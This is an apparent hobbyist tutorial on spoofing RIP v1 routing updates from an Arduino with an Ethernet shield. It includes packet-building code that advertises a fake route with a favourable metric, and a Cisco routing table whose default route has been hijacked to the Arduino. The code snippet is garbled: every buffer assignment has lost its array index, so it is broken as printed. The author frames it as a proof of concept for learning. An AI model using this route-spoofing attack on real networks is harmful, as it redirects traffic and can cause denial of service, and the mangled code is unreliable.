This is a quick intstructable with some proof of concept code to show that routing protocols can be spoofed using Arduino. It also serves as a quick introduction to using the ethernet shield and gets your arduino sending packets!
RIP v1 is an early routing protocol. Routing protocols are used to exchange information between routers on the internet or private networks. The information exchanged contains details of known networks that the sending router has access to. This is how routers learn and share information about new routes to new networks.
If this information is spoofed / altered it can cause unexpected behaviour within a network or cause Denial of Service. This is purely a proof of concept and is not meant for such purposes.
Things you need:
- Ethernet Shield
- Router running RIP for testing
- Optional LCD screen
Teachers! Did you use this instructable in your classroom?
Add a Teacher Note to share how you incorporated it into your lesson.
Step 1: Connect the Shield and Screen
First things first is to connect the physical equipment.
Mount the shield and connect it to your network.
Wire up an LCD screen if you want to.
I have used the following pins for the LCD:
Step 2: Upload the Code!
memset(packetBuffer, 0, packetSize); // erase the contents of packetBuffer packetBuffer = 0x2; // Rip command type of response packetBuffer= 0x1; //Define which version of RIP to use: RIP v1 packetBuffer = 0x0;// bytes of padding packetBuffer= 0x0; packetBuffer= 0x0; packetBuffer = 0x02; packetBuffer= 0xC0; // first octet of network ID to spoof 0xC0 = 192 in decimal, this could be any network you want to advertise packetBuffer=0x00; // metric for the route, the lower the metric the more favourable it is Udp.write(packetBuffer,packetSize); Udp.endPacket();// note the packet isn’t actually sent until you call endPacket().
Step 3: See the Results
A great tool for checking what actually going on is Wireshark. Download this here:
This will show what packets are being transmitted for the whole network. Watch the video to see traffic before the spoofer starts and after. You can see the arduino is sending Numerous RIP v1 Response packets to the network broadcast address. Any routers on the network will add this advertised route to its routing table.
Here is a Cisco router that has had its default route replaced by the arduino - this will forward all traffic for networks that the router currently doesnt have a route for to the arduino.
Router#show ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 E1 - OSPF external type 1, E2 - OSPF external type 2 i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2 ia - IS-IS inter area, * - candidate default, U - per-user static route o - ODR, P - periodic downloaded static route Gateway of last resort is 192.168.1.133 to network 0.0.0.0 R 192.0.0.0/24 [120/1] via 192.168.1.133, 00:02:54, FastEthernet0 C 192.168.1.0/24 is directly connected, FastEthernet0 C 192.168.2.0/24 is directly connected, Tunnel0 R* 0.0.0.0/0 [120/1] via 192.168.1.133, 00:00:00, FastEthernet0
Next idea is to attempt OSPF spoofing but this will be much more difficult as its a much more complicated protocol and can actually be authenticated etc.
Any questions please ask :)